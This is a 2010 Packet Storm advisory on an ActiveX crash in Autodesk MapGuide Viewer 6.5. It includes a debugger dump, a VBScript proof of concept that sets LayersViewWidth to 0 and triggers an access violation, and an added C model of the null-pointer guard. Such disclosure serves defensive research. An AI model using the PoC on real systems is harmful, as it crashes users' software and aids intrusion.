
Autodesk MapGuide Viewer Overflow

01 Sep 2010 · Reported by d3b4g · Type: packetstorm · Source: packetstormsecurity.com

Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability, Access Violation Exception Cod

Code
`# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability  
# Date: [01-09-2010]  
# Author: [d3b4g]  
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821  
# Version: [6.5]  
# Tested on: [Winxp SP3]  
# regards to ROL guys  
  
  
  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)  
  
Seh Chain:  
--------------------------------------------------  
1 192847C MGAXCTRL.DLL  
2 73352542 VBSCRIPT.dll  
3 7C839AD8 KERNEL32.dll  
  
  
  
Registers:  
--------------------------------------------------  
EIP 0175CE9E  
EAX 00000001  
EBX 003EB690 -> 0193F684  
ECX 00000000  
EDX 003E0608 -> 00180F98  
EDI 003EB5D8 -> 0193FC24  
ESI 00000404  
EBP 0013EA84 -> 0013EAA0  
ESP 0013EA58 -> 003EB644  
  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 003EB644 -> 0193F90C  
EBP+12 00000000  
EBP+16 0013EAD4 -> 00130000  
EBP+20 0042C4F4 -> 00110024  
EBP+24 0013EA94 -> 0013EAD4  
EBP+28 0013EB30 -> 0013EBC0  
  
  
Block Disassembly:  
--------------------------------------------------  
175CE8F POP ESI  
175CE90 JMP [EAX+60]  
175CE93 PUSH ESI  
175CE94 LEA ESI,[ECX+404]  
175CE9A TEST ESI,ESI  
175CE9C JE SHORT 0175CEC2  
175CE9E CMP DWORD PTR [ESI+1C],0 <--- CRASH  
175CEA2 JE SHORT 0175CEC2  
175CEA4 PUSH 0  
175CEA6 PUSH DWORD PTR [ESP+C]  
175CEAA MOV ECX,ESI  
175CEAC PUSH 0  
175CEAE CALL 01912C63  
175CEB3 MOV EAX,[ESI]  
175CEB5 MOV ECX,ESI  
  
  
  
  
  
PoC:  
  
  
<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />  
<script language='vbscript'>  
  
'File Generated by COMRaider v0.0.133 - http://labs.idefense.com  
  
'Wscript.echo typename(target)  
  
'for debugging/custom prolog  
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"  
prototype = "Property Let LayersViewWidth As Long"  
memberName = "LayersViewWidth"  
progid = "MGMapControl.MGMap"  
argCount = 1  
  
arg1=0  
  
target.LayersViewWidth = arg1  
  
</script>  
  
`
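Added example (not part of the original advisory or of Autodesk's code): a C model of the guard in the block disassembly above. With ECX = 0, `LEA ESI,[ECX+404]` yields 0x404, so `TEST ESI,ESI` passes and the `CMP` reads address 0x420. The function names and the 64 KB near-null threshold used for triage are assumptions of this example.

```c
#include <stdint.h>
#include <stdio.h>

/* Offsets taken from the listing: LEA ESI,[ECX+404] and CMP DWORD PTR [ESI+1C],0 */
#define MEMBER_OFFSET 0x404u
#define FIELD_OFFSET  0x1Cu
/* Assumption: addresses below 64 KB are never mapped in a Win32 user process. */
#define NEAR_NULL_LIMIT 0x10000u

/* Guard as in the listing: tests the derived pointer (ESI), not the object (ECX). */
static int guard_as_compiled(uint32_t this_ptr) {
    uint32_t member = this_ptr + MEMBER_OFFSET;   /* LEA ESI,[ECX+404] */
    return member != 0;                           /* TEST ESI,ESI / JE  */
}

/* Guard that checks the object pointer before forming the member address. */
static int guard_on_base(uint32_t this_ptr) {
    return this_ptr != 0;
}

/* Address the CMP at 175CE9E reads for a given object pointer. */
static uint32_t cmp_read_address(uint32_t this_ptr) {
    return this_ptr + MEMBER_OFFSET + FIELD_OFFSET;
}

/* Triage helper: a fault this close to zero is consistent with a null object pointer. */
static int is_near_null(uint32_t addr) {
    return addr < NEAR_NULL_LIMIT;
}

int main(void) {
    uint32_t ecx = 0x00000000u;  /* ECX from the register dump */
    printf("listing guard passes: %d\n", guard_as_compiled(ecx));
    printf("CMP reads 0x%08X, near-null: %d\n",
           (unsigned)cmp_read_address(ecx), is_near_null(cmp_read_address(ecx)));
    printf("base-pointer guard passes: %d\n", guard_on_base(ecx));
    /* The listing's guard rejects only the one base that wraps to zero. */
    printf("listing guard on 0xFFFFFBFC: %d\n", guard_as_compiled(0xFFFFFBFCu));
    return 0;
}
```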
